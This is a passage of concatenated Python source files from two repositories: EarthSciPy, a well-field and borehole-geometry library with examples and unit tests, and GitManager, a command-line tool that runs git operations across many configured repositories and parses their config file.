        self.Well_list = []  # wells belonging to this field
        self.field_name = arg_field_name
        # BUG FIX: topleft/bottomright used to be *class* attributes, so every
        # WellField instance mutated the same two StaticDot3D objects in
        # update_field_size() and the bounding boxes of separate fields bled
        # into each other.  They are now per-instance.
        self.topleft = StaticDot3D( 0, 0, 0 )
        self.bottomright = StaticDot3D( 0, 0, 0 )

    def update_field_size( self, a_StaticDot3D ):
        """Grow the bounding box so it contains the given dot."""
        self.topleft.X = min( self.topleft.X, a_StaticDot3D.X )
        self.topleft.Y = min( self.topleft.Y, a_StaticDot3D.Y )
        self.topleft.Z = min( self.topleft.Z, a_StaticDot3D.Z )
        self.bottomright.X = max( self.bottomright.X, a_StaticDot3D.X )
        self.bottomright.Y = max( self.bottomright.Y, a_StaticDot3D.Y )
        self.bottomright.Z = max( self.bottomright.Z, a_StaticDot3D.Z )

    def add_well( self, arg_well ):
        """Register a well with this field and update the field size."""
        self.Well_list.append( arg_well )
        arg_well.wellfield = self
        # recalculate field size from the new wellhead
        self.update_field_size( arg_well.wellhead )
--- FILE SEPARATOR ---
from earthscipy.wells import *
from wells_example_data import Create_WellField_North, Create_WellField_South

# Build the two example fields and dump wells plus geometry as plain text.
WF_N = Create_WellField_North()
WF_S = Create_WellField_South()

print('\nprint out the list of wells')
for wf in [ WF_N, WF_S, ]:
    print( "\nField", wf.field_name )
    for i in wf.Well_list:
        print( '\nWell', i.wellname )
        print ( 'wellhead X %+5d Y %+5d Z %+5d well_length %d' % ( i.wellhead.X, i.wellhead.Y, i.wellhead.Z, i.well_length ) )
        print('\nprint out the geometry data for well', i.wellname )
        for s in i.geometry:
            print( 'Inclination %.1f tangent %.1f vertical %.1f. Start length %.1f. End point X Y Z (%.1f, %.1f, %.1f)' % ( s.inclination, s.tangent, s.vertical, s.start_length, s.end_dot.X, s.end_dot.Y, s.end_dot.Z ) )
    # per-field bounding box summary
    print ( '\nfield size top (X %d Y %d Z %d) bottom (X %d Y %d Z %d)' % ( wf.topleft.X, wf.topleft.Y, wf.topleft.Z, wf.bottomright.X, wf.bottomright.Y, wf.bottomright.Z ) )
print("\nEnd")
--- FILE SEPARATOR ---
from earthscipy.wells import *
from wells_example_data import Create_WellField_North, Create_WellField_South

# Render the example well fields as nested HTML tables on stdout.
WF_N = Create_WellField_North()
WF_S = Create_WellField_South()

print( '<h1>Testing</h1>' )
for wf in [ WF_N, WF_S, ]:
    print( "<h2>Field", wf.field_name, "</h2>" )
    print( '<table border="2">' )
    print('<tr><th>Well</th><th>Well head</th><th>Well length</th><th>Geometry data</th></tr>')
    for i in wf.Well_list:
        print('<tr>')
        print( '<td>Well', i.wellname, '</td>' )
        print( '<td>' )
        print ( 'X %+5d Y %+5d Z %+5d' % ( i.wellhead.X, i.wellhead.Y, i.wellhead.Z ) )
        print( '</td>' )
        print( '<td>' )
        print ( 'well_length %d' % ( i.well_length ) )
        print('</td>')
        print( '<td>' )
        # nested table: one row per inclinometry step
        print('<table border="1">')
        # BUG FIX: the column header was misspelled "Targent".
        print('<tr><th>Inclination</th><th>Vertical</th><th>Tangent</th><th>Start length</th><th>End point X Y Z </th></tr>')
        for s in i.geometry:
            print('<tr>')
            print('<td>')
            print('%.1f' % ( s.inclination ) )
            print('</td>')
            print( '<td>%.2f.</td>' % ( s.vertical ) )
            print( '<td>%.2f.</td>' % ( s.tangent ) )
            print( '<td>%.2f.</td>' % ( s.start_length ) )
            print( '<td>%.2f, %.2f, %.2f</td>' % ( s.end_dot.X, s.end_dot.Y, s.end_dot.Z ) )
            print('</tr>')
        print('</table>')
        print( '</td>' )
        print('</tr>')
    print( '</table>' )
    print ( '<p>field size top (X %d Y %d Z %d) bottom (X %d Y %d Z %d)' % ( wf.topleft.X, wf.topleft.Y, wf.topleft.Z, wf.bottomright.X, wf.bottomright.Y, wf.bottomright.Z ), '</p>' )
print("\nEnd")
--- FILE SEPARATOR ---
from earthscipy.wells import *
def Create_WellField_North():
    """Build the example "North" well field with a handful of wells."""
    field = WellField( "North" )
    # simple wells defined by a wellhead only
    field.add_well( Well( 'N_well#1', 11, -7 ) )
    field.add_well( Well( 'N_well#3', 1, 1 ) )
    field.add_well( Well( 'N_well#4', 100, 100, -2 ) )
    # a deviated well with several inclinometry steps
    deviated = Well( 'N_well#5', 0, 0 )
    for length, vertical in ( ( 10, 0 ), ( 10, 45 ), ( 10, 90 ), ( 100, 0 ) ):
        deviated.add_geometry_step( length, vertical )
    field.add_well( deviated )
    field.add_well( Well( 'N_well#6', -99, 88, 1 ) )
    # a short well with a single step
    short_well = Well( 'N_well#9', -100, -100 )
    short_well.add_geometry_step( 1, 0 )
    field.add_well( short_well )
    return field
def Create_WellField_South():
    """Build the example "South" well field containing a single well."""
    field = WellField("South")
    field.add_well( Well( 'S_well#1', 11, -7 ) )
    return field
--- FILE SEPARATOR ---
# Minimal setuptools packaging script for the earthscipy library.
from setuptools import setup

setup(name='earthscipy',
      version='0.0.0',
      description='Earth science lib',
      url='https://github.com/postpdm/EarthSciPy',
      author='YN.Coder',
      author_email='yn.coder@gmail.com',
      license='-',
      packages=['earthscipy'],
      zip_safe=False)
--- FILE SEPARATOR ---
# tests for EarthSciPy
--- FILE SEPARATOR ---
from earthscipy.wells import *
from unittest import TestCase
from math import fabs, sqrt
# We do not much care about trigonometry precision. Underground measurements is not so accurate
PERMISSIBLE_VARIATION_VALUE = 0.000001
PERMISSIBLE_VARIATION_VALUE_ROUGH = 0.01
class WellField_Test(TestCase):
    """Unit tests for StaticDot3D, WellGeometryStep, Well and WellField."""

    def test_StaticDot3D(self):
        # the constructor stores the three coordinates verbatim
        s = StaticDot3D( 1, 2, 3 )
        self.assertEqual( s.X, 1 )
        self.assertEqual( s.Y, 2 )
        self.assertEqual( s.Z, 3 )

    # --- single-step geometry at cardinal angles ---
    def test_WellGeometryStepX_0( self ):
        WGS = WellGeometryStep( StaticDot3D( 0, 0, 0 ), 10 )
        self.assertEqual( WGS.end_dot.X, 10 )
    def test_WellGeometryStepY_0( self ):
        WGS = WellGeometryStep( StaticDot3D( 0, 0, 0 ), 10 )
        self.assertEqual( WGS.end_dot.Y, 0 )
    def test_WellGeometryStepZ_0( self ):
        WGS = WellGeometryStep( StaticDot3D( 0, 0, 0 ), 10 )
        self.assertEqual( WGS.end_dot.Z, 0 )
    def test_WellGeometryStepX_45( self ):
        WGS = WellGeometryStep( StaticDot3D( 0, 0, 0 ), 10, 45 )
        # NOTE(review): 10*cos(45°) is 7.0710678...; the constant below looks
        # like transposed digits but still lies within the tolerance.
        self.assertTrue( fabs( fabs( WGS.end_dot.X ) - 7.0710687 ) < PERMISSIBLE_VARIATION_VALUE )
    def test_WellGeometryStepY_45( self ):
        WGS = WellGeometryStep( StaticDot3D( 0, 0, 0 ), 10, 45 )
        self.assertTrue( fabs( fabs( WGS.end_dot.Y ) - 7.0710687 ) < PERMISSIBLE_VARIATION_VALUE )
    def test_WellGeometryStepZ_45( self ):
        WGS = WellGeometryStep( StaticDot3D( 0, 0, 0 ), 10, 45 )
        self.assertEqual( WGS.end_dot.Z, 0 )
    def test_WellGeometryStepX_90( self ):
        WGS = WellGeometryStep( StaticDot3D( 0, 0, 0 ), 10, 90 )
        self.assertTrue( fabs( WGS.end_dot.X ) < PERMISSIBLE_VARIATION_VALUE )
    def test_WellGeometryStepY_90( self ):
        WGS = WellGeometryStep( StaticDot3D( 0, 0, 0 ), 10, 90 )
        self.assertEqual( WGS.end_dot.Y, 10 )
    def test_WellGeometryStepZ_90( self ):
        WGS = WellGeometryStep( StaticDot3D( 0, 0, 0 ), 10, 90 )
        self.assertEqual( WGS.end_dot.Z, 0 )
    def test_WellGeometryStepX_5_2( self ):
        WGS = WellGeometryStep( StaticDot3D( 0, 0, 0 ), 10, 5, 2 )
        self.assertTrue( fabs( fabs( WGS.end_dot.X ) - 9.955878 ) < PERMISSIBLE_VARIATION_VALUE )
    def test_WellGeometryStepY_5_2( self ):
        WGS = WellGeometryStep( StaticDot3D( 0, 0, 0 ), 10, 5, 2 )
        self.assertTrue( fabs( fabs( WGS.end_dot.Y ) - 0.871026 ) < PERMISSIBLE_VARIATION_VALUE )
    def test_WellGeometryStepZ_5_2( self ):
        WGS = WellGeometryStep( StaticDot3D( 0, 0, 0 ), 10, 5, 2 )
        self.assertTrue( fabs( fabs( WGS.end_dot.Z ) - 0.348994 ) < PERMISSIBLE_VARIATION_VALUE )

    def test_well_coordinates(self):
        # the field bounding box must span all wellheads
        WF = WellField("_")
        WF.add_well( Well( 'well#1', 11, -7 ) )
        WF.add_well( Well( 'well#2', -99, 88, 1 ) )
        WF.add_well( Well( 'well#3', 1, 1 ) )
        WF.add_well( Well( 'well#4', 100, 100, -2 ) )
        self.assertEqual( WF.topleft.X, -99)
        self.assertEqual( WF.topleft.Y, -7)
        self.assertEqual( WF.topleft.Z, -2)
        self.assertEqual( WF.bottomright.X, 100)
        self.assertEqual( WF.bottomright.Y, 100)
        self.assertEqual( WF.bottomright.Z, 1)

    def test_well_field_mutable(self):
        # WellField contains mutable lists; check they are not shared between instances
        WF_1 = WellField("1")
        WF_2 = WellField("2")
        WF_1.add_well( Well( 'well#1', 0, 0 ) )
        self.assertEqual( len( WF_1.Well_list ), 1 )  # a well was added to the first field
        self.assertEqual( len( WF_2.Well_list ), 0 )  # no well was added to the second field

    def test_well_mutable(self):
        # Well contains a mutable geometry list; check it is not shared between instances
        W_1 = Well("well#1", 0, 0 )
        W_2 = Well("well#2", 0, 0)
        W_1.add_geometry_step( 10 )
        self.assertEqual( len( W_1.geometry ), 1 )  # a step was added to the first well
        self.assertEqual( len( W_2.geometry ), 0 )  # no step was added to the second well

    def test_well_inclination(self):
        # well_length accumulates step inclinations; start_length records the pre-step length
        W = Well( 'test well', 1, 1, 1 )
        self.assertEqual( W.well_length, 0 )
        W.add_geometry_step( 10 )
        self.assertEqual( W.well_length, 10 )
        W.add_geometry_step( 10 )
        self.assertEqual( W.well_length, 20 )
        W.add_geometry_step( 12 )
        self.assertEqual( W.well_length, 32 )
        W.add_geometry_step( 12 )
        self.assertEqual( W.well_length, 44 )
        self.assertEqual( W.geometry[-1].start_length, 32 )

    def test_well_inclination_circle_X(self):
        # this couldn't happen in real life
        W1 = Well( 'test well', 0, 0, 0 )
        W1.add_geometry_step( 10, 0, 0 )
        W1.add_geometry_step( 10, 90, 0 )
        W1.add_geometry_step( 10, 180, 0 )
        W1.add_geometry_step( 10, 270, 0 )
        self.assertEqual( W1.well_length, 40 )
        self.assertTrue( fabs( W1.End_Dot().X ) < PERMISSIBLE_VARIATION_VALUE )

    def test_well_inclination_circle_XY(self):
        # this couldn't happen in real life
        W1 = Well( 'test well', 0, 0, 0 )
        W1.add_geometry_step( 10, 0, 0 )
        W1.add_geometry_step( 10, 90, 0 )
        W1.add_geometry_step( 10, 180, 0 )
        W1.add_geometry_step( 10, 270, 0 )
        self.assertEqual( W1.well_length, 40 )
        self.assertTrue( fabs( W1.End_Dot().X ) < PERMISSIBLE_VARIATION_VALUE )
        self.assertTrue( fabs( W1.End_Dot().Y ) < PERMISSIBLE_VARIATION_VALUE )

    def test_well_inclination_50steps(self):
        # alternating +/- deviations must cancel in Y and Z
        W1 = Well( 'test well', 0, 0, 0 )
        for i in range(0, 50):
            W1.add_geometry_step( 10, 11, -7 )
            W1.add_geometry_step( 10, -11, 7 )
        self.assertEqual( W1.End_Dot().Y, 0 )
        self.assertEqual( W1.End_Dot().Z, 0 )
        self.assertTrue( W1.End_Dot().X < W1.well_length )
        self.assertEqual( W1.well_length, 1000 )

    def test_well_inclination_drill_small_cube(self):
        W1 = Well( 'test well 1', 0, 0, 0 )
        W1.add_geometry_step( sqrt(3), 45, 35.5 )  # it should be a cube with 1m edges
        self.assertTrue( fabs( 1 - W1.End_Dot().X ) < PERMISSIBLE_VARIATION_VALUE_ROUGH )
        self.assertTrue( fabs( 1 - W1.End_Dot().Y ) < PERMISSIBLE_VARIATION_VALUE_ROUGH )
        self.assertTrue( fabs( 1 - W1.End_Dot().Z ) < PERMISSIBLE_VARIATION_VALUE_ROUGH )
        self.assertEqual( sqrt( ( W1.End_Dot().X * W1.End_Dot().X ) + ( W1.End_Dot().Y * W1.End_Dot().Y ) + ( W1.End_Dot().Z * W1.End_Dot().Z ) ), sqrt(3) )

    def test_well_inclination_drill_small_cuboid(self):
        W1 = Well( 'test well 1', 0, 0, 0 )
        W1.add_geometry_step( sqrt(1+4+9), 56.309932474, 15.5013595669 )  # it should be a cuboid with 1-2-3m edges
        self.assertTrue( fabs( 2 - W1.End_Dot().X ) < PERMISSIBLE_VARIATION_VALUE_ROUGH )
        self.assertTrue( fabs( 3 - W1.End_Dot().Y ) < PERMISSIBLE_VARIATION_VALUE_ROUGH )
        self.assertTrue( fabs( 1 - W1.End_Dot().Z ) < PERMISSIBLE_VARIATION_VALUE_ROUGH )
        self.assertTrue( fabs( sqrt( ( W1.End_Dot().X * W1.End_Dot().X ) + ( W1.End_Dot().Y * W1.End_Dot().Y ) + ( W1.End_Dot().Z * W1.End_Dot().Z ) ) - sqrt(1+4+9) ) < PERMISSIBLE_VARIATION_VALUE )

    def test_well_inclination_drill_big_cube(self):
        # one 1000m step must land at the same point as 100 steps of 10m
        W1 = Well( 'test well 1', 0, 0, 0 )
        W1.add_geometry_step( 1000, 17, 9 )
        W2 = Well( 'test well 2', 0, 0, 0 )
        for i in range(0, 100):
            W2.add_geometry_step( 10, 17, 9 )
        self.assertTrue( fabs( W1.End_Dot().X - W2.End_Dot().X ) < PERMISSIBLE_VARIATION_VALUE )
        self.assertTrue( fabs( W1.End_Dot().Y - W2.End_Dot().Y ) < PERMISSIBLE_VARIATION_VALUE )
        self.assertTrue( fabs( W1.End_Dot().Z - W2.End_Dot().Z ) < PERMISSIBLE_VARIATION_VALUE )
|
[
"/earthscipy/__init__.py",
"/earthscipy/wells.py",
"/examples/wells_example.py",
"/examples/wells_example_HTML.py",
"/examples/wells_example_data.py",
"/setup.py",
"/tests/__init__.py",
"/tests/wells_tests.py"
] |
00mjk/GitManager
|
#!/usr/bin/env python
# Entry point: delegate to GitManager.main and propagate its exit code.
import sys
from GitManager import main

if __name__ == '__main__':
    code = main.main(sys.argv)
    sys.exit(code)
--- FILE SEPARATOR ---
from typing import List
import typing
from ..utils import format
from ..repo import description
class Command(object):
    """ Base class for commands that iterate over configured repositories.

    Class flags tune behaviour:
    PLAIN  -- plain output; no fancy per-repository counter lines.
    LOCAL  -- restrict the run to repositories that exist locally.
    FILTER -- treat the first positional argument as a repository filter.
    """
    PLAIN = False
    LOCAL = False
    FILTER = False

    def __init__(self, line: format.TerminalLine,
                 repos: List[description.RepositoryDescription],
                 *args: str):
        """ Create a command over *repos*, writing output through *line*. """
        self.__line = line
        self.__repos = repos
        # NOTE(review): Command.parse returns None, so __args is None here
        # unless a subclass overrides parse to return something.
        self.__args = self.parse(*args)
        # current state when running this command
        self.__idx = None
        self.__repo = None

    def parse(self, *args: str) -> typing.Any:
        """ Parses arguments given to this Command.

        When FILTER is set and an argument is present, narrows __repos to
        the ones whose remote matches the pattern.  Returns nothing.
        """
        # if we support filtering, set the filter
        if self.__class__.FILTER and len(args) > 0:
            self.__repos = list(
                filter(lambda d: d.remote.matches(args[0]), self.__repos))

    @property
    def args(self) -> typing.Any:
        """ Arguments passed to this instance (whatever parse() returned). """
        return self.__args

    @property
    def repos(self) -> List[description.RepositoryDescription]:
        """ A list of repositories subject to this command. """
        # if we are a local command, we only use local repositories
        if self.__class__.LOCAL:
            return list(filter(lambda ds: ds.local.exists(), self.__repos))
        # else we return all the repositories
        else:
            return list(self.__repos)

    @property
    def line(self) -> format.TerminalLine:
        """ The terminal line used for output. """
        return self.__line

    def run(self, repo: description.RepositoryDescription) \
            -> bool:
        """ Runs this Command on a given repository; subclasses must override. """
        raise NotImplementedError

    def write(self, message: typing.Any):
        """ Writes text from this command on a fresh line. """
        self.line.linebreak()
        print(message)

    def write_with_counter(self, message: str):
        """ Writes a message together with a [i/total] counter into the line. """
        # repo count and number of zeros for it
        repo_count = len(self.repos)
        zcount = len(str(repo_count))
        # the prefix - a counter, zero-padded to align
        prefix = "[{}/{}] ".format(
            str(self.__idx + 1).zfill(zcount),
            repo_count,
        )
        self.line.write("{}{}".format(prefix, message))

    def write_path_with_counter(self, path: str):
        """ Writes a (shortened) path with a counter. """
        # repo count and number of zeros for it
        repo_count = len(self.repos)
        zcount = len(str(repo_count))
        # the prefix - a counter (recomputed to know its width)
        prefix = "[{}/{}] ".format(
            str(self.__idx + 1).zfill(zcount),
            repo_count,
        )
        # shorten the path so prefix + path fit the terminal width
        message = format.Format.short_path(path, self.line.width - len(prefix))
        self.write_with_counter(message)

    def __call__(self, *args: str) -> int:
        """ Runs this command on the repository set.

        Returns the number of repositories for which run() reported success.
        NOTE(review): *args is accepted but unused -- arguments are consumed
        in __init__/parse instead.
        """
        counter = 0
        for (i, repo) in enumerate(self.repos):
            self.__idx = i
            self.__repo = repo
            if not self.__class__.PLAIN:
                self.write_path_with_counter(repo.local.path)
            if self.run(repo):
                counter += 1
        self.line.clean()
        return counter
--- FILE SEPARATOR ---
from GitManager.utils import format
from GitManager.config import file
from GitManager.repo import implementation, description
import os
import argparse
class Clone(object):
    """ A command to clone and optionally save a repository """

    def __init__(self, line: format.TerminalLine, config: file.File,
                 *commandargs):
        """ Parse the clone command's arguments.

        :param line: terminal line used for output.
        :param config: configuration file the repository may be saved into.
        """
        self.config = config
        self.line = line
        parser = argparse.ArgumentParser('Clones a repository as '
                                         'configured in the config '
                                         'file. ')
        parser.add_argument('--save', action='store_true', default=False)
        parser.add_argument('url', help='URL to clone')
        parser.add_argument('arguments', nargs=argparse.REMAINDER,
                            help='Extra arguments to pass to git clone '
                                 'command. ')
        self.args = parser.parse_args(commandargs)

    def url_to_description(self, url: str) \
            -> description.RepositoryDescription:
        """ Turns a URL into a repository description.

        The local path is derived from config.root plus the remote's
        path components.
        NOTE(review): plain strings (remote.url / local.path) are passed
        here, yet __call__ later calls desc.local.exists() -- confirm that
        RepositoryDescription re-wraps them into repository objects.
        """
        remote = implementation.RemoteRepository(url)
        local = implementation.LocalRepository(
            os.path.join(self.config.root, *remote.components()))
        return description.RepositoryDescription(remote.url, local.path)

    def __call__(self):
        """ Clone the repository, optionally saving it to the config file. """
        # get the path to clone into
        desc = self.url_to_description(self.args.url)
        if desc.local.exists():
            self.line.write('Repository already exists, nothing to clone. ')
            return
        # if requested, save it
        if self.args.save:
            self.config.insert_repo_or_get(desc)
            self.config.write()
        desc.remote.clone(desc.local, *self.args.arguments)
--- FILE SEPARATOR ---
import typing
from ..repo import description
from . import Command
class Fetch(Command):
    """ Fetches all remotes for every locally existing repository. """
    LOCAL = True
    FILTER = True

    def run(self, repo: description.RepositoryDescription) -> bool:
        # Nothing to fetch unless the repository is checked out on disk.
        if repo.local.exists():
            return repo.local.fetch()
        return False
--- FILE SEPARATOR ---
import typing
from ..repo import description
from . import Command
class GC(Command):
    """ Runs house keeping tasks with parameters """
    LOCAL = True
    FILTER = True

    def parse(self, *args: str) -> typing.Any:
        """ Parses arguments given to this Command.

        A leading non-flag argument is treated as a repository filter and
        forwarded to Command.parse; the remaining arguments are kept for
        ``git gc``.
        NOTE(review): ``self.__args`` mangles to ``_GC__args`` here, so it
        shadows rather than sets the ``_Command__args`` returned by the
        ``Command.args`` property -- confirm this asymmetry is intended.
        """
        if len(args) > 0 and not args[0].startswith('-'):
            super(GC, self).parse(args[0])
            self.__args = args[1:]
        else:
            self.__args = args

    def run(self, repo: description.RepositoryDescription) -> bool:
        # Skip repositories that are not checked out locally.
        if not repo.local.exists():
            return False
        self.line.linebreak()
        return repo.local.gc(*self.__args)
--- FILE SEPARATOR ---
import typing
from ..repo import description
from . import Command
class LsLocal(Command):
    """ Prints the path of every locally existing repository, one per line. """
    PLAIN = True
    LOCAL = True
    FILTER = True

    def run(self, repo: description.RepositoryDescription) -> bool:
        # Guard clause: skip repositories that are not checked out.
        if not repo.local.exists():
            return None
        print(repo.local.path)
        return True
--- FILE SEPARATOR ---
import typing
from ..repo import description
from . import Command
class Pull(Command):
    """ Pulls each locally existing repository from its remote. """
    LOCAL = True
    FILTER = True

    def run(self, repo: description.RepositoryDescription) -> bool:
        # A repository that was never cloned cannot be pulled.
        if repo.local.exists():
            self.line.linebreak()
            return repo.local.pull()
        return False
--- FILE SEPARATOR ---
import typing
from ..repo import description
from . import Command
class Push(Command):
    """ Pushes each locally existing repository to its remote. """
    LOCAL = True
    FILTER = True

    def run(self, repo: description.RepositoryDescription) -> bool:
        # A repository that was never cloned cannot be pushed.
        if repo.local.exists():
            self.line.linebreak()
            return repo.local.push()
        return False
--- FILE SEPARATOR ---
import typing
import argparse
from ..config import file
from ..repo import finder
from ..repo.implementation import LocalRepository
from ..utils import format
import os
import sys
class Reconfigure(object):
    """ Reconfigure the configuration file"""

    def __init__(self, line: format.TerminalLine, f: file.File, *args: str):
        # terminal line for output and the configuration file being edited
        self.file = f
        self.line = line
        self.args = self.parse(*args)

    def parse(self, *args: str) -> typing.Any:
        """ Parses arguments given to this Command """
        parser = argparse.ArgumentParser(prog='git-manager reconfigure',
                                         description='Recursively add '
                                                     'repositories to the '
                                                     'configuration file')
        parser.add_argument('--simulate', '-s', dest='simulate',
                            action='store_true', default=False,
                            help='Instead of writing out the configuration '
                                 'file to disk, print it to STDOUT. ')
        parser.add_argument('--rebuild', '-re', dest='rebuild',
                            action='store_true', default=False,
                            help='Rebuild and clean up the configuration '
                                 'file, removing empty groups. ')
        parser.add_argument('--remove', '-rm', dest='remove',
                            nargs='*',
                            help='Remove directories from config file '
                                 'provided they exist. ')
        parser.add_argument('--clear', '-c', dest='clear',
                            action='store_true', default=False,
                            help='Clear all existing repositories from the '
                                 'configuration. ')
        parser.add_argument('--follow-symlinks', '-f', dest='follow_symlinks',
                            action='store_true', default=False,
                            help='When looking for repositories to add, '
                                 'automatically follow symlinks. Use with '
                                 'caution, as there are no checks for '
                                 'circularity. ')
        parser.add_argument('--allow-subrepositories', '-a',
                            dest='allow_subrepositories',
                            action='store_true', default=False,
                            help='When looking for repositories to add, '
                                 'keep searching within folders of existing '
                                 'repositories. ')
        parser.add_argument('path', nargs='?', default=None,
                            help='Rebuild and clean up the configuration '
                                 'file, removing empty groups. ')
        return parser.parse_args(args)

    def __call__(self):
        """ Apply removal/clear/scan/rebuild steps, then write or print. """
        # if no paths are given, use the current path
        if not self.args.rebuild and \
                self.args.path is None and \
                not self.args.remove:
            self.args.path = os.getcwd()
        # remove all the locally given repositories
        if self.args.remove:
            for path in self.args.remove:
                success = self.file.remove_local(LocalRepository(path))
                if not self.args.simulate:
                    if success:
                        self.line.write('Removed {}'.format(path))
                    else:
                        self.line.write('Not Found: {}'.format(path))
                    self.line.linebreak()
        # clear the existing list if asked
        if self.args.clear:
            self.file.lines = []
        if self.args.path is not None:
            # find repositories in the given path add them
            for desc in finder.Finder.find_recursive(
                    self.args.path,
                    allow_links=self.args.follow_symlinks,
                    continue_in_repository=self.args.allow_subrepositories,
                    callback=lambda s: self.line.write(
                        format.Format.short_path(s, self.line.width))
            ):
                if not self.args.simulate:
                    self.line.linebreak()
                # print if we found a new repository
                if not self.file.contains(desc):
                    self.line.write(desc.path)
                    self.line.linebreak()
                    self.line.write(" {}".format(desc.source))
                    self.line.linebreak()
                self.file.insert_repo_or_get(desc)
        # if the rebuild flag is set, rebuild all the repos
        if self.args.rebuild:
            self.file.rebuild()
        # --simulate prints the resulting config instead of writing it
        if self.args.simulate:
            for line in self.file.lines:
                print(line.write())
        else:
            self.file.write()
--- FILE SEPARATOR ---
import typing
import argparse
from ..repo import description
from ..repo import implementation
from ..utils import format
from . import Command
class State(Command):
    """ Checks the state of all repositories, and list all those out-of-date"""

    LOCAL = True
    FILTER = True

    def parse(self, *args: str) -> typing.Any:
        """ Parses arguments given to this Command """
        parser = argparse.ArgumentParser(prog='git-manager state')
        parser.add_argument('pattern', nargs='?')

        group = parser.add_mutually_exclusive_group()
        group.add_argument('--update', dest='update',
                           action='store_true', default=True,
                           help='Update remote references using \'git '
                                'remote update\' before showing status. '
                                'Enabled by default. ')
        group.add_argument('--no-update', dest='update',
                           action='store_false',
                           help='DO NOT update remote references using '
                                '\'git remote update\' '
                                'before showing status. ')

        parsed = parser.parse_args(args)

        # hand any given pattern on to the generic filtering of Command
        if parsed.pattern:
            super(State, self).parse(parsed.pattern)

        return parsed

    def run(self, repo: description.RepositoryDescription) -> bool:
        """ Reports the remote state of a single repository """
        if not repo.local.exists():
            return False

        status = repo.local.remote_status(self.args.update)

        # map every out-of-date state to the message shown to the user
        notices = {
            implementation.RemoteStatus.REMOTE_NEWER:
                format.Format.yellow('Upstream is ahead of your branch, '
                                     'pull required. '),
            implementation.RemoteStatus.LOCAL_NEWER:
                format.Format.green('Your branch is ahead of upstream, '
                                    'push required.'),
            implementation.RemoteStatus.DIVERGENCE:
                format.Format.red('Your branch and upstream have diverged, '
                                  'merge or rebase required. '),
        }

        if status in notices:
            self.line.linebreak()
            print(notices[status])

        return status == implementation.RemoteStatus.UP_TO_DATE
--- FILE SEPARATOR ---
import typing
from ..repo import description
from ..utils import run
from . import Command
class Status(Command):
    """ Checks that status of all repositories """

    LOCAL = True
    FILTER = True

    def run(self, repo: description.RepositoryDescription) -> bool:
        """ Prints 'git status' for a single repository when it is dirty """
        local = repo.local
        if not local.exists():
            return False

        porcelain = local.local_status()

        # a non-empty (and non-None) porcelain status means the working
        # tree is dirty -- show the full human-readable status
        if porcelain:
            self.line.linebreak()
            run.GitRun("status", cwd=local.path, pipe_stdout=True).wait()

        return porcelain == ''
--- FILE SEPARATOR ---
import typing
import os.path
from . import line, tree
class File(tree.Tree):
    """ Methods for parsing and reading configuration file. """

    def __init__(self, fn: str):
        """ Creates a new File object

        :param fn: Path to the configuration file on disk
        """
        super().__init__()
        self.__fn = fn

    def read(self):
        """ Re-reads the lines currently contained in this file """
        with open(self.__fn, "r") as fp:
            # iterate the file lazily instead of materialising it with
            # readlines(); only the trailing newline is stripped so that
            # indentation is preserved
            self.lines = [line.ConfigLine.parse(l.rstrip('\n')) for l in fp]

    def write(self):
        """ Writes the lines currently contained in this file to disk """
        with open(self.__fn, "w") as fp:
            for l in self.lines:
                fp.write("{}\n".format(l.write()))

    @staticmethod
    def find() -> typing.Optional[str]:
        """finds the location of the configuration file

        :return: the first existing candidate path, or None if there is no
        configuration file anywhere
        """
        # 1. Check $GIT_MANAGER_CONFIG if set
        git_manager_config = os.environ.get("GIT_MANAGER_CONFIG")
        if git_manager_config is not None and \
                os.path.isfile(git_manager_config):
            return git_manager_config

        # 2. ~/.config/.gitmanager/config
        # (or $XDG_CONFIG_HOME/.gitmanager/config if set)
        xdg_config_home = os.environ.get(
            "XDG_CONFIG_HOME",
            os.path.join(os.path.expanduser("~"), ".config"))
        xdg_config_path = os.path.join(xdg_config_home, ".gitmanager",
                                       "config")
        if os.path.isfile(xdg_config_path):
            return xdg_config_path

        # 3. ~/.gitmanager
        fallback_path = os.path.join(os.path.expanduser("~"), ".gitmanager")
        if os.path.isfile(fallback_path):
            return fallback_path

        # nothing found -- be explicit instead of falling off the end
        return None
__all__ = ["File"]
--- FILE SEPARATOR ---
import re
import typing
class ConfigLine(object):
    """ A single line in the configuration file """

    DIRECTIVE_ROOT = re.compile(r'^(\s*)##(\s*)([^\s]+)(\s*)$')
    DIRECTIVE_NOP = re.compile(r'^((\s*)#(.*))|(\s*)$')
    DIRECTIVE_BASE = re.compile(
        r'(\s*)(>+)(\s+)([^\s]+)(\s*)$')
    DIRECTIVE_REPO = re.compile(r'^(\s*)([^>\s]+)(?:(\s+)([^\s]+))?(\s*)$')

    def __init__(self, indent: str):
        """ Creates a new ConfigLine object

        :param indent: The indent of this ConfigLine Line
        """
        self.__indent = indent

    def __repr__(self):
        return "{}({})".format(self.__class__.__name__, repr(self.write()))

    @property
    def indent(self) -> str:
        """ The leading whitespace of this line """
        return self.__indent

    def write(self) -> str:
        """ Turns this ConfigLine into a string that can be re-parsed """
        raise NotImplementedError

    @staticmethod
    def parse(s: str):
        """ Parses a string into a ConfigLine

        :rtype: ConfigLine"""

        # NOTE: the order of these checks matters -- a root directive
        # ('## path') would otherwise also match the comment (NOP) pattern

        m = ConfigLine.DIRECTIVE_ROOT.match(s)
        if m is not None:
            return RootLine(*m.groups())

        m = ConfigLine.DIRECTIVE_NOP.match(s)
        if m is not None:
            return NOPLine(s)

        m = ConfigLine.DIRECTIVE_BASE.match(s)
        if m is not None:
            (indent, arrows, space_1, path, space_2) = m.groups()
            return BaseLine(indent, len(arrows), space_1, path,
                            space_2 or '')

        m = ConfigLine.DIRECTIVE_REPO.match(s)
        if m is not None:
            (indent, url, space_1, path, space_2) = m.groups()
            return RepoLine(indent, url, space_1 or '', path or '', space_2)

        raise ValueError("Input does not represent a ConfigLine")
class NOPLine(ConfigLine):
    """ A line without meaning inside the Configuration File """

    def __init__(self, line: str):
        """ Creates a new NopLine instance """
        super().__init__('')
        # the raw text is kept verbatim so the file round-trips unchanged
        self.__raw = line

    @property
    def content(self) -> str:
        """ The content of this line """
        return self.__raw

    def write(self) -> str:
        """ Turns this ConfigLine into a string that can be re-parsed """
        return self.__raw

    def __eq__(self, other: typing.Any) -> bool:
        """ Checks that this line is equal to another line """
        if not isinstance(other, NOPLine):
            return False
        return self.content == other.content
class RootLine(ConfigLine):
    """ A line defining the root of all repositories """

    def __init__(self, indent: str, space_1: str, root: str, space_2: str):
        """ Creates a new RootLine instance """
        super().__init__(indent)
        self.__pre = space_1
        self.__root = root
        self.__post = space_2

    @property
    def root(self) -> str:
        """ The root path being set """
        return self.__root

    def write(self) -> str:
